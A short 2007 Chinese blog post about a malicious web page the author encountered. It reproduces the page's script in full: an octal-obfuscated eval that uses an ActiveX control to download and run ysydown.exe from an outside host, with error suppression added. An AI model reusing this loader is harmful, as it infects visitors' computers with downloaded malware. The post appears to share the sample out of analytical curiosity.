碰到了ysydown.exe毒霸提交竟然已经有人给提交过了

2007-10-18 14:28:16 作者：

从网站看到的一个病毒脚本,里面的代码太多了啊
不过发现了一个破解加密的好办法

<SCRIPT LANGUAGE='JavaScript'>  
<!--  
function ResumeError() {  
return true;  
}  
window.onerror = ResumeError;  
// -->  
</SCRIPT> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> 
<title></title> 
<script> 
eval("\146\165\156\143\164\151\157\156\40\104\157\167\156\144\154\157\141\144\103\141\154\143\101\156\144\122\165\156\50\51\15\12\173\15\12\143\157\155\56\104\154\157\141\144\104\123\50\42\150\164\164\160\72\57\57\170\170\170\56\143\163\154\162\61\56\143\157\155\57\171\163\171\165\160\144\141\164\145\56\143\141\142\42\54\40\42\171\163\171\144\157\167\156\56\145\170\145\42\54\40\60\51\73\15\12\175"); 
</script> 
</head> 
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}"> 
</OBJECT> 
<script> 
DowndloadCalcAndRun() 
</script> 
</html> 

解密方法,我也是第一次这样的测试,不用去解码八进制了

[Ctrl+A 全选注:如需引入外部Js需刷新才能执行]